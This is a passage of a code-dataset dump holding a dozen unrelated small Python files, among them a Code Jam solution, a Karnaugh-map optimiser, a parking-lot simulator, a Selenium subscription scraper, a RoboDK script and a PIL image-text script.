","sub_path":"Camellia/Mod/Mod_ReadJson.py","file_name":"Mod_ReadJson.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"201238483","text":"T=int(input())\nfor i in range (T):\n N=int(input())\n myheights=[]\n for j in range (2*N-1):\n line=input().split()\n for k in range (N):\n line[k]=int(line[k])\n myheights.append(line)\n heightcount={}\n for j in range (2501):\n heightcount[j]=0\n for row in myheights:\n for height in row:\n heightcount[height]+=1\n output=\"\"\n for j in range (2501):\n if heightcount[j]%2==1:\n output+=\" \" + str(j) \n print (\"Case #\" + str(i+1) + \":\" + output)\n","sub_path":"codes/CodeJamCrawler/16_1_2/Dukati8/Rank and File B.py","file_name":"Rank and File B.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"588180117","text":"import math\nimport itertools\nimport string\n\ndef slide(kmap, group, height, width):\n #Given a list of 2-indexs, see if there is a symmetric, adjacent group\n #Returns a list of all groups found\n\n if height >= rowN:\n return []\n if width >= colN:\n return []\n\n foundGroups = [group]\n\n\n\n for move in [[0,width],[0,-width],[height,0],[-height,0]]:\n valid = True\n symGroup = []\n for i in group:\n #Check in current direction, modulo\n rowCheck = (i[0]+move[0])%rowN\n colCheck = (i[1]+move[1])%colN\n \n if kmap[rowCheck][colCheck] == 0 or ([rowCheck,colCheck] in group): #Not in SOP group if 0\n valid = False\n break\n else:\n symGroup.append([rowCheck,colCheck])\n if valid:\n #Found a valid symmetric group in that direction\n foundGroups += slide(kmap,group+symGroup,height+abs(move[0]),width+abs(move[1])) #See if it can get bigger\n \n return foundGroups\n\ndef getGroups(kmap): #Gets all possible prime implicants\n posGroups = []\n\n #Start group growth from every 1\n for i in range(rowN):\n for i2 in range(colN):\n if kmap[i][i2] == 1:\n posGroups += slide(kmap, [[i,i2]], 1, 1)\n \n \n return posGroups\n\ndef getOptimalLayout(kmap): #Initialization method for optimization\n print(\"Generating groups...\")\n 
posGroups = getGroups(kmap)\n\n    posGroups.sort()\n    posGroups = list(posGroups for posGroups,_ in itertools.groupby(posGroups))\n    \n    posGroups = applySubsetFilter(posGroups)\n\n    \n    #Make every possible layout of groups, eval and return best\n    print(\"Optimizing...\")\n    return optimize([],posGroups,0,kmap)\n\ndef applySubsetFilter(groups): #Removes groups contained fully within other groups\n    for g in [x for x in groups]:\n        for g2 in [x for x in groups]:\n            if not(g is g2):\n                #Check for containment\n                contained = True\n                for e in g:\n                    if not(e in g2):\n                        contained = False\n                        break\n                if contained:\n                    groups.remove(g)\n                    break\n    return groups\n\ndef optimize(cur, opt, curCost, kmap): #Minimizes gate cost and returns best layout and cost\n    if covers(cur,kmap):\n        return [cur,curCost]\n    \n    MIN = [None,99999999]\n    for o in opt:\n        if not(o in cur):\n            best = optimize(cur+[o],opt,getGroupCost(o)+curCost,kmap)\n            if best[1] < MIN[1]:\n                MIN = best\n\n    return MIN\n\ndef covers(layout, kmap): #Check if a layout covers every 1\n    kTruth = [[e for e in r] for r in kmap] #Copy\n    for g in layout:\n        for e in g:\n            kTruth[e[0]][e[1]] = 0\n\n    for row in kTruth: #Search for uncovered 1's\n        if 1 in row:\n            return False\n    return True\n    \n\ndef getGroupCost(g): #Return cost for group\n    return int(rowN - math.log2(len(g))) #Assumes square k-map, need one for rect\n\ndef letter(i): #Number to letter\n    return string.ascii_letters[i]\n    \ndef printLayout(layout,kmap): #Display groups human-readable\n    kCopy = [[e for e in r] for r in kmap] #Copy\n    i=0\n    for g in layout[0]:\n        i+=1\n        for p in g:\n            kCopy[p[0]][p[1]] = str(kCopy[p[0]][p[1]])+letter(i)\n\n    for r in kCopy:\n        print([str(e) for e in r])\n    print(\"Cost:\",layout[1],\"gates\")\n    \ndef groupIt(kmap): #Only method the user needs to call\n    global rowN, colN\n    rowN = len(kmap)\n    colN = len(kmap[0])\n    printLayout(getOptimalLayout(kmap),kmap)\n    \n    \n    \n\n    \n","sub_path":"groupIt.py","file_name":"groupIt.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"347407914","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport atexit\nimport time\nimport RPi.GPIO as GPIO\n\n# ensure the cleanup function is called when the script exits\natexit.register(GPIO.cleanup)\n\n# use logical (BCM) pin numbering\nGPIO.setmode(GPIO.BCM)\n\nPORTAS = [17, 4, 9, 11, 7, 27, 22, 10]\n\nfor porta in PORTAS:\n    GPIO.setup(porta, GPIO.OUT)\n    GPIO.output(porta, 1)\n    time.sleep(.5)\n","sub_path":"experiments/rpi/dojo/display7_bcm.py","file_name":"display7_bcm.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"401702466","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\nimport django.contrib.auth.models\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('auth', '0006_require_contenttypes_0002'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='FavoriteGenre',\n            fields=[\n                ('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),\n                ('genre', models.CharField(max_length=80)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='UserIMDB',\n            fields=[\n                ('user_ptr', models.OneToOneField(parent_link=True, auto_created=True, to=settings.AUTH_USER_MODEL, primary_key=True, serialize=False)),\n                ('name', models.TextField()),\n                ('mail', 
models.EmailField(max_length=254)),\n ('is_Pro', models.BooleanField()),\n ('birthday', models.DateField()),\n ('picture', models.ImageField(upload_to='')),\n ],\n options={\n 'abstract': False,\n 'verbose_name': 'user',\n 'verbose_name_plural': 'users',\n },\n bases=('auth.user',),\n managers=[\n ('objects', django.contrib.auth.models.UserManager()),\n ],\n ),\n migrations.AddField(\n model_name='favoritegenre',\n name='UserIMDB',\n field=models.ForeignKey(to='UserManager.UserIMDB'),\n ),\n ]\n","sub_path":"imdbsite/UserManager/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"331924014","text":"# import pandas as pd\n# import json\n# from argparse import ArgumentParser\nimport sys\n\n# data_object_1[color].append(reg_num)\ndata_object_1 = dict()\n# data_object_2[reg_num] = slot_num\ndata_object_2 = dict()\n# data_object_3[color].append(slot_num)\ndata_object_3 = dict()\nsize_of_the_parking = 0\noccupancy_array = list()\n\n\nclass Car:\n def __init__(self, color, reg_num):\n self.color = color\n self.reg_num = reg_num\n\n\ndef find_status():\n global occupancy_array\n print(\"{0} {1} {2} \".format(\"Slot No.\", \"Registration No\", \"Colour\"))\n for i in range(len(occupancy_array)):\n if occupancy_array[i]:\n print(\"{0} {1} {2}\".format(i+1, occupancy_array[i].reg_num, occupancy_array[i].color))\n\n\n# $ status\n# Slot No.\n# 1\n# 2\n# 3\n# 5\n# 6\n# Registration No\n# KA-01-HH-1234\n# KA-01-HH-9999\n# KA-01-BB-0001\n# KA-01-HH-2701\n# KA-01-HH-3141\n# Colour\n# White\n# White\n# Black\n# Blue\n# Black\n\n\n# $ create_parking_lot 6\n# Created a parking lot with 6 slots\ndef create_parking_lot(n):\n # print(\"creating parking lot\")\n global size_of_the_parking\n size_of_the_parking = n\n global occupancy_array\n occupancy_array = [None for _ in range(n)]\n # print(\"occupancy_array : {0}\".format(occupancy_array))\n return \"Created a parking lot with {0} slots\".format(n)\n\n\n# $ leave 4\n# Slot number 4 is free\ndef is_vehicle_present(slot_number):\n global occupancy_array\n if occupancy_array[slot_number]:\n return True\n else:\n return False\n\n\ndef leave_the_vehicle(slot_number):\n if is_vehicle_present(slot_number):\n global occupancy_array\n # occupancy_array.pop(slot_number)\n # occupancy_array.insert(slot_number, None)\n occupancy_array[slot_number-1] = None\n return \"Slot number {0} is free\".format(slot_number)\n else:\n return \"Sorry, slot_number:{0} is already occupied\".format(slot_number)\n\n\n# $ park KA-01-P-333 White\n# Allocated slot number: 4\n# $ park DL-12-AA-9999 White\n# Sorry, parking lot is full\ndef is_parking_full():\n global occupancy_array\n # print(\"inside is_parking_full : occupancy_array :{0}\".format(occupancy_array))\n for i in range(len(occupancy_array)):\n if occupancy_array[i] is None:\n # print(\"not full\")\n return False\n else:\n # print(\"parking is FULL\")\n return True\n\n\ndef find_nearest_slot_avl():\n global occupancy_array\n for i in range(len(occupancy_array)):\n if occupancy_array[i] is None:\n slot_num = i+1\n return slot_num\n\n\ndef park(reg_num, color):\n # print(\"parking vehicle number :{0} of color:{1}\".format(reg_num, color))\n if is_parking_full():\n return \"Sorry, parking lot is full\"\n else:\n c1 = Car(color, reg_num)\n # slot_num = str(find_nearest_slot_avl())\n slot_num = int(find_nearest_slot_avl())\n # data_object_1[color].append(c1.reg_num)\n reg_num_list = 
[reg_num]\n        slot_num_list = [slot_num]\n        try:\n            data_object_1[color].append(reg_num)\n        except KeyError:\n            # print(\"1st car got parked of color: {0}\".format(color))\n            data_object_1[color] = reg_num_list\n\n        try:\n            data_object_2[reg_num] = slot_num\n            # print(\"car reg_num : {0} got parked at slot num: {1}\".format(reg_num, slot_num))\n        except KeyError:\n            print(\"reg number is unique, so a car with a given reg num that is\"\n                  \" already parked cannot be parked again until it has left\")\n\n        try:\n            data_object_3[color].append(slot_num)\n        except KeyError:\n            data_object_3[color] = slot_num_list\n\n        slot_number = find_nearest_slot_avl()\n        # occupancy_array.insert(slot_number-1, c1)\n        occupancy_array[slot_number - 1] = c1\n        return \"Allocated slot number: {0}\".format(slot_num)\n\n\n# $ registration_numbers_for_cars_with_colour White\n# KA-01-HH-1234, KA-01-HH-9999, KA-01-P-333\ndef find_registration_numbers_for_cars_with_colour(color):\n    # data_object_1 = json.dump(data_object_1.json)\n    try:\n        list_of_reg_num = data_object_1[color]\n        return list_of_reg_num\n    except KeyError:\n        return \"Not found\"\n    except Exception as err_msg:\n        return err_msg\n\n\n# $ slot_numbers_for_cars_with_colour White\n# 1, 2, 4\n# $ slot_number_for_registration_number KA-01-HH-3141\n# 6\n# $ slot_number_for_registration_number MH-04-AY-1111\n# Not found\ndef find_slot_numbers_for_cars_with_colour(color):\n    global data_object_3\n    # data_object_1 = json.dump(data_object_1.json)\n    try:\n        list_of_reg_num = data_object_3[color]\n        return list_of_reg_num\n    # except KeyError:\n    #     return \"Not found\"\n    except ValueError as err_msg:\n        raise ValueError(\"problem : {0}\".format(str(err_msg)))\n\n\ndef find_slot_number_for_registration_number(reg_num):\n    global data_object_3\n    try:\n        slot_num = data_object_2[reg_num]\n        return slot_num\n    except KeyError:\n        return \"Not found\"\n    except ValueError as err_msg:\n        raise ValueError(\"problem in find_slot_number_for_registration_number: {0}\".format(str(err_msg)))\n\n\ndef display_formating_for_list(response):\n    # print(\"response :{0} and type(response) : {1}\".format(response, type(response)))\n    # accumulate every item so the whole list is printed, not only the last pair\n    str_sol = \"\"\n    for item in response[:-1]:\n        str_sol += str(item) + \", \"\n    str_sol += str(response[-1])\n    print(str_sol)\n\n\ndef run_as_interactive_input():\n    while 1:\n        cmd_str = input()\n        # print(\"ur input is :{0}\".format(cmd_str))\n\n        if cmd_str == \"exit\":\n            # print(\"ur input is :{0}\".format(cmd_str))\n            return\n\n        else:\n            # cmd = input().split()\n            cmd_list = cmd_str.split()\n            # print(\"ur input is :{0}\".format(cmd_str))\n            if len(cmd_list) == 1 and cmd_list[0] == \"status\":\n                # print(\"ur input is :{0}\".format(cmd_str))\n                find_status()\n\n            elif len(cmd_list) == 2:\n                if cmd_list[0] == \"create_parking_lot\":\n                    # print(\"ur input is :{0}\".format(cmd_str))\n                    response = create_parking_lot(int(cmd_list[1]))\n                    print(response)\n                elif cmd_list[0] == \"leave\":\n                    # print(\"ur input is :{0}\".format(cmd_str))\n                    response = leave_the_vehicle(slot_number=int(cmd_list[1]))\n                    print(response)\n                elif cmd_list[0] == \"registration_numbers_for_cars_with_colour\":\n                    # print(\"ur input is :{0}\".format(cmd_list))\n                    response = find_registration_numbers_for_cars_with_colour(color=cmd_list[1])\n                    display_formating_for_list(response)\n                elif cmd_list[0] == \"slot_numbers_for_cars_with_colour\":\n                    # print(\"ur input is :{0}\".format(cmd_str))\n                    response = find_slot_numbers_for_cars_with_colour(color=cmd_list[1])\n                    display_formating_for_list(response)\n                elif cmd_list[0] == 
\"slot_number_for_registration_number\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_number_for_registration_number(reg_num=cmd_list[1])\n print(response)\n\n elif len(cmd_list) == 3:\n if cmd_list[0] == \"park\":\n # print(\"ur input is :{0}\".format(cmd_str))\n # print(\"ur input is :{0}, {1}, {2}\".format(cmd_list[0], cmd_list[1], cmd_list[2]))\n response = park(reg_num=cmd_list[1], color=cmd_list[2])\n print(response)\n # park(reg_num, color)\n # park KA-01-P-333 White\n\n else:\n print(\"Enter correct command\")\n\n\ndef run_as_per_file_input(file_name):\n with open(file_name, \"r\") as f1:\n data = f1.readlines()\n\n for cmd_str in data:\n # # print(\"ur input is :{0}\".format(cmd_str))\n\n if cmd_str == \"exit\":\n # # print(\"ur input is :{0}\".format(cmd_str))\n return\n\n else:\n # cmd = input().split()\n cmd_list = cmd_str.split()\n # # print(\"ur input is :{0}\".format(cmd_str))\n if len(cmd_list) == 1 and cmd_list[0] == \"status\":\n # # print(\"ur input is :{0}\".format(cmd_str))\n find_status()\n\n elif len(cmd_list) == 2:\n if cmd_list[0] == \"create_parking_lot\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = create_parking_lot(int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"leave\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = leave_the_vehicle(slot_number=int(cmd_list[1]))\n print(response)\n elif cmd_list[0] == \"registration_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_list))\n response = find_registration_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_numbers_for_cars_with_colour\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_numbers_for_cars_with_colour(color=cmd_list[1])\n display_formating_for_list(response)\n elif cmd_list[0] == \"slot_number_for_registration_number\":\n # print(\"ur input is :{0}\".format(cmd_str))\n response = find_slot_number_for_registration_number(reg_num=cmd_list[1])\n print(response)\n\n elif len(cmd_list) == 3:\n if cmd_list[0] == \"park\":\n # print(\"ur input is :{0}\".format(cmd_str))\n # print(\"ur input is :{0}, {1}, {2}\".format(cmd_list[0], cmd_list[1], cmd_list[2]))\n response = park(reg_num=cmd_list[1], color=cmd_list[2])\n print(response)\n # park(reg_num, color)\n # park KA-01-P-333 White\n\n else:\n print(\"Enter correct command\")\n\n\ndef main():\n # print(len(sys.argv))\n\n if len(sys.argv) > 1:\n # input is from file\n run_as_per_file_input(sys.argv[1])\n else:\n run_as_interactive_input()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"already_asked_questions/gojek/parking-lot-1.4.2/detailed_debug_parking_lot.py","file_name":"detailed_debug_parking_lot.py","file_ext":"py","file_size_in_byte":10487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"405453949","text":"import os\nfrom itertools import count\nimport gym\n\nfrom lagom import StepRunner\nfrom lagom.utils import pickle_dump\nfrom lagom.utils import set_global_seeds\nfrom lagom.experiment import Config\nfrom lagom.experiment import Grid\nfrom lagom.experiment import run_experiment\nfrom lagom.envs import RecordEpisodeStatistics\nfrom lagom.envs import NormalizeObservation\nfrom lagom.envs import NormalizeReward\nfrom lagom.envs import TimeStepEnv\n\nfrom baselines.vpg.agent import Agent\nfrom baselines.vpg.engine import Engine\n\n\nconfig = Config(\n {'log.freq': 10, \n 'checkpoint.num': 3,\n \n 'env.id': 
Grid(['HalfCheetah-v3', 'Hopper-v3', 'Walker2d-v3', 'Swimmer-v3']), \n 'env.normalize_obs': True,\n 'env.normalize_reward': True,\n \n 'nn.sizes': [64, 64],\n \n 'agent.lr': 1e-3,\n 'agent.use_lr_scheduler': False,\n 'agent.gamma': 0.99,\n 'agent.gae_lambda': 0.97,\n 'agent.standardize_adv': True, # standardize advantage estimates\n 'agent.max_grad_norm': 0.5, # grad clipping by norm\n 'agent.entropy_coef': 0.01,\n 'agent.value_coef': 0.5,\n \n # only for continuous control\n 'env.clip_action': True, # clip action within valid bound before step()\n 'agent.std0': 0.6, # initial std\n \n 'train.timestep': int(1e6), # total number of training (environmental) timesteps\n 'train.timestep_per_iter': 1000, # number of timesteps per iteration\n })\n\n\ndef make_env(config, seed, mode):\n assert mode in ['train', 'eval']\n env = gym.make(config['env.id'])\n env.seed(seed)\n env.observation_space.seed(seed)\n env.action_space.seed(seed)\n if config['env.clip_action'] and isinstance(env.action_space, gym.spaces.Box):\n env = gym.wrappers.ClipAction(env)\n if mode == 'train':\n env = RecordEpisodeStatistics(env, deque_size=100)\n if config['env.normalize_obs']:\n env = NormalizeObservation(env, clip=5.)\n if config['env.normalize_reward']:\n env = NormalizeReward(env, clip=10., gamma=config['agent.gamma'])\n env = TimeStepEnv(env)\n return env\n \n\ndef run(config, seed, device, logdir):\n set_global_seeds(seed)\n \n env = make_env(config, seed, 'train')\n agent = Agent(config, env, device)\n runner = StepRunner(reset_on_call=False)\n engine = Engine(config, agent=agent, env=env, runner=runner)\n train_logs = []\n checkpoint_count = 0\n for i in count():\n if agent.total_timestep >= config['train.timestep']:\n break\n train_logger = engine.train(i)\n train_logs.append(train_logger.logs)\n if i == 0 or (i+1) % config['log.freq'] == 0:\n train_logger.dump(keys=None, index=0, indent=0, border='-'*50)\n if agent.total_timestep >= int(config['train.timestep']*(checkpoint_count/(config['checkpoint.num'] - 1))):\n agent.checkpoint(logdir, i + 1)\n checkpoint_count += 1\n pickle_dump(obj=train_logs, f=logdir/'train_logs', ext='.pkl')\n return None\n \n\nif __name__ == '__main__':\n run_experiment(run=run, \n config=config, \n seeds=[1770966829, 1500925526, 2054191100], \n log_dir='logs/default',\n max_workers=os.cpu_count(), \n chunksize=1, \n use_gpu=False, # CPU a bit faster\n gpu_ids=None)\n","sub_path":"baselines/vpg/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"161877197","text":"from DroneDenoise.DataHandler.DataHandler import SignalsHandler\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nif __name__ == '__main__':\n window_size = 960\n sin_mask = np.hanning(window_size)\n sh = SignalsHandler('D:\\\\private_git\\\\DroneDenoise\\\\Data\\\\Extracted_Raw_Drone\\\\sides')\n signal = sh.get_signal()\n signal.add_noise()\n s_noise = signal.X[100000:100000 + window_size]\n s_clean = signal.Y[100000:100000 + window_size]\n s_noise = np.reshape(s_noise, (-1))#*sin_mask\n s_clean = np.reshape(s_clean, (-1))#*sin_mask\n\n _, ax = plt.subplots()\n ax.plot(s_noise, label='noise')\n ax.plot(s_clean, label='clean')\n plt.legend(loc='best')\n plt.grid(True)\n plt.show()\n\n\n # Number of samplepoints\n N = window_size\n # sample spacing\n T = 1.0 / 48000.0\n yf_clean = np.fft.fft(s_clean)\n yf_noise = np.fft.fft(s_noise)\n xf = np.linspace(0.0, 1.0 / (2.0 * T), N//2)\n\n 
_, ax = plt.subplots()\n    ax.plot(xf, 2.0 / N * np.abs(yf_noise[:N//2]), label='noise')\n    ax.plot(xf, 2.0 / N * np.abs(yf_clean[:N//2]), label='clean')\n    plt.legend(loc='best')\n    plt.show()\n\n","sub_path":"DataHandler/print_fft.py","file_name":"print_fft.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"298078982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep  8 19:33:35 2019\r\n\r\n@author: Cumali\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport random \r\nimport matplotlib.pyplot as plt\r\n\r\ndata=pd.read_csv(\"Ads_CTR_Optimisation.csv\")\r\n\r\nN=10000\r\nd=10\r\nsummary=0\r\nchoosens=[]\r\nfor n in range(0,N):\r\n    ad=random.randrange(d)\r\n    choosens.append(ad)\r\n    reward=data.values[n,ad]# if row n of the data is 1, the reward is 1\r\n    summary=summary+reward\r\n\r\nplt.hist(choosens)\r\nplt.show() ","sub_path":"Machine Learninh with Python/22randomSampling.py","file_name":"22randomSampling.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"474719975","text":"# The football.csv file contains the results from the English Premier League. \n# The columns labeled ‘Goals’ and ‘Goals Allowed’ contain the total number of \n# goals scored for and against each team in that season (so Arsenal scored 79 \n# goals against opponents, and had 36 goals scored against them). Write a\n# program to read the file, then print the name of the team with the smallest\n# difference in ‘for’ and ‘against’ goals.\n\nimport csv\n\n# open the file, convert it to first a csv reader object, then a list\nf = open('football.csv', 'r')\nr = csv.reader(f)\nl = list(r)\n\n# remove the header entry\nheader = l.pop(0)\n\n# goals are in index 5 and goals allowed are in index 6 in the original csv,\n# but let's see if we find it without prior knowledge of which columns they're\n# in\nfor col in range(len(header)):\n\tif header[col] == 'Team':\n\t\tteamname = col\n\t\tcontinue\n\tif header[col] == 'Goals':\n\t\tgoals = col\n\t\tcontinue\n\tif header[col] == 'Goals Allowed':\n\t\tgoals_allowed = col\n\n\n# makes a list of two element lists by parsing out each team name followed by \n# that team's goals-goals allowed\ngoal_diff_list = []\nfor team in l:\n\tgoal_diff_list.append( [ team[teamname], \n\t\t\t\tint(team[goals])-int(team[goals_allowed]) ] )\n\n# now to sort by goal difference (lowest goal difference should be element 0)\nsorted_goal_diff = sorted(goal_diff_list, key = lambda x: x[-1])\n\nprint(sorted_goal_diff[0][0])\n# poor Leicester, at least they got their title in the 15-16 season\n","sub_path":"python/q8_parsing.py","file_name":"q8_parsing.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"422856359","text":"import pickle\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nfrom myPkgs.Data import *\n\nimport urllib.parse as up\n\n\nclass Scraper:\n    def __init__(self):\n\n        options = webdriver.ChromeOptions()\n        options.add_argument('--user-data-dir=' + Path.profile)\n        options.add_argument('--disable-features=InfiniteSessionRestore')\n        # options.add_argument('--headless')\n\n        self.driver = webdriver.Chrome(\n            options=options, executable_path=Path.driver)\n\n    def 
getPage(self, url):\n        self.driver.get(url)\n\n    def setSubscriptionsPage(self):\n        self.driver.get(Scrap.subscriptionsPage)\n\n    def wait(self):\n        input(\"press any key\")\n\n    def getInfoFromSubScriptions(self):\n        d = self.driver\n\n        infoList=[]\n        infoDictList=[]\n\n        try:\n            # use self.driver here, not the module-level scraper instance\n            subscriptionsSize= WebDriverWait(self.driver, 60 * 15).until(\n                EC.presence_of_element_located((By.XPATH, Scrap.subscriptionsSize))\n            )\n        finally:\n            print(\"scraping start\")\n\n        subscriptionsSize=subscriptionsSize.text.replace(\"(\",\"\").replace(\")\",\"\")\n        subscriptionsSize=int(subscriptionsSize)\n\n        subscriptions = d.find_elements_by_class_name(Scrap.titleClass)\n        while subscriptionsSize!=len(subscriptions):\n            d.execute_script(\"window.scrollTo(0,document.body.scrollHeight)\")\n            time.sleep(3)\n            subscriptions = d.find_elements_by_class_name(Scrap.titleClass)\n\n        for subscription in subscriptions:\n            aData = subscription.find_elements_by_tag_name(\"a\")\n            aText=[aElem.text for aElem in aData]\n\n            if len(aText)<4:\n                continue\n\n            info=Info()\n            info.title=aText[1]\n            info.latest=aText[2]\n            info.lastRead=aText[3]\n\n            # set links\n            urlText=[\n                up.urljoin(Scrap.baseUrl,aElem.get_attribute(\"href\"))\n                for aElem in aData\n            ]\n            info.linkTitle=urlText[1]\n            info.linkLatest=urlText[2]\n            info.linkLastRead=urlText[3]\n\n\n            infoDict={}\n            infoDict[Const.title]=aText[1]\n            infoDict[Const.latest]=aText[2]\n            infoDict[Const.lastRead]=aText[3]\n\n            spanData=subscription.find_elements_by_tag_name(\"span\")\n            if len(spanData)<2:\n                continue\n            info.latestDate=spanData[1].text.replace(\"· \",\"\")\n            infoDict[Const.latestDate]=spanData[1].text.replace(\"· \",\"\")\n\n\n            infoConverted=self.convertInfo(info)\n            infoList.append(infoConverted)\n\n            infoDictConverted=self.convertInfoDict(infoDict)\n            infoDictList.append(infoDictConverted)\n\n        print(\"subscriptions is over\")\n\n        for i in infoList:\n            print(i)\n\n        # save infoList to pickle\n\n        with open(Path.infoList,mode=\"wb\")as f:\n            pickle.dump(infoList,f)\n        with open(Path.infoDictList,mode=\"wb\")as f:\n            pickle.dump(infoDictList,f)\n\n\n    def convertInfo(self,info:Info):\n        latest=info.latest\n        latest=latest.replace(\"Chapter \",\"\")\n        info.latest=latest\n\n        lastRead=info.lastRead\n        if \"Ongoing \" in lastRead:\n            info.lastRead=\"0\"\n        else:\n            lastRead=lastRead.replace(\"Chapter \",\"\")\n            info.lastRead=lastRead\n\n        return info\n\n\n    def convertInfoDict(self,info:dict):\n        latest=info[Const.latest]\n        latest=latest.replace(\"Chapter \",\"\")\n        info[Const.latest]=latest\n\n        lastRead=info[Const.lastRead]\n        if \"Ongoing \" in lastRead:\n            info[Const.lastRead]=\"0\"\n        else:\n            lastRead=lastRead.replace(\"Chapter \",\"\")\n            info[Const.lastRead]=lastRead\n        return info\n\n    # def getSubscriptionInfo(self,subscription):\n\n    def close(self):\n        print(\"driver is quit.\")\n        self.driver.quit()\n\nif __name__ == '__main__':\n    scraper = Scraper()\n    scraper.setSubscriptionsPage()\n    scraper.getInfoFromSubScriptions()\n    scraper.close()\n","sub_path":"myPkgs/Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"77546411","text":"# --------------------------------------------\n# --------------- DESCRIPTION ----------------\n#\n# Save the 3D view point as a station parameter.\n#\n# More information about the RoboDK API for Python here:\n#     https://robodk.com/doc/en/RoboDK-API.html\n#     https://robodk.com/doc/en/PythonAPI/index.html\n#\n# More information on RoboDK Apps here:\n#     
https://github.com/RoboDK/Plug-In-Interface/tree/master/PluginAppLoader\n#\n# --------------------------------------------\n\nfrom robodk import robolink, robomath, roboapps\n\n\ndef SaveView(view_name):\n \"\"\"\n Save the 3D view point as a station parameter.\n \"\"\"\n\n # Start the RoboDK API\n RDK = robolink.Robolink()\n\n # Get the 3D view pose\n vp = RDK.ViewPose()\n\n # Convert to a string as XYZABC\n vp_str = str(robomath.Pose_2_KUKA(vp))\n\n # Save it as a station parameter (saved with the RDK file)\n RDK.setParam(view_name, vp_str)\n\n RDK.ShowMessage(\"Current view point saved: \" + vp_str, False)\n\n\ndef runmain():\n \"\"\"\n Entrypoint of this action when it is executed on its own or interacted with in RoboDK.\n Important: Use the function name 'runmain()' if you want to compile this action.\n \"\"\"\n\n if roboapps.Unchecked():\n roboapps.Exit()\n else:\n SaveView(\"Snapshot-View-0\")\n\n\nif __name__ == '__main__':\n runmain()","sub_path":"PluginAppLoader/Apps/Snapshot/SaveView.py","file_name":"SaveView.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"357564026","text":"from PIL import Image, ImageDraw, ImageFont\r\nimport os , textwrap\r\n\r\nc = 3\r\ntext1 = 'i am k.tarun naga sai eejhfsjkf sfhauefwhfusnfs fjskdhfwehpfwoiw weeof ks jsfjshfppiowfiw'\r\ntext2 = 'hisidf suifhsnfufew ewhf s fsjh fu whfb xmjsjffsk uefhuwifh nsf ufhwufsfjhksfj aueh ewp'\r\ntext3 = 'klfsfnsdo fshdfh s fjshfjaskf sfhsfhweuihewu jfsjfhjsbf jhfsjfhuefjnf cndhsgfewywb if'\r\ntext4 = 'kfjlkjsdf jnsjvyrbvdhgfhjthajs ehueksd dfhfkf jf hyre fnskj ffaeifoij if isf f sf sf j'\r\ntext5 = 'jsfkjdsfnlsdij fuefhwsksfj ncnveryisjkjf fuhqu hff sfjsjfh sfpifwf jsjf fj wi fuehfuhas n'\r\ntext6 = 'fkjjkdfnsy ifheuhfwufhj fjfj sfhrybda nds hfuew psfjafj sfheu asksknj sfweua;oewnf s iewuhe'\r\n\r\nif c==1:\r\n img = 'love1.jpg'\r\nelif c==2:\r\n hey=1\r\nelse:\r\n img = 'love2.jpg' \r\n\r\n\r\ndef love(ja):\r\n ja = 'love3.png'\r\n return\r\n\r\n\r\nim = Image.open(img)\r\nfont_type = ImageFont.truetype('BRUSHSCI.TTF', 70)\r\ndraw = ImageDraw.Draw(im)\r\n# Wrap this text.\r\nwrapper = textwrap.TextWrapper(width=75)\r\n#####################################################\r\nvalue = text1\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 300\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = text2\r\nword_list = wrapper.wrap(text=value)\r\n# Print each line.\r\nx = 100\r\ny = 450\r\nfor element in word_list:\r\n draw.text((x, y), element, font=font_type)\r\n y = y+52\r\n######################################################\r\nvalue = 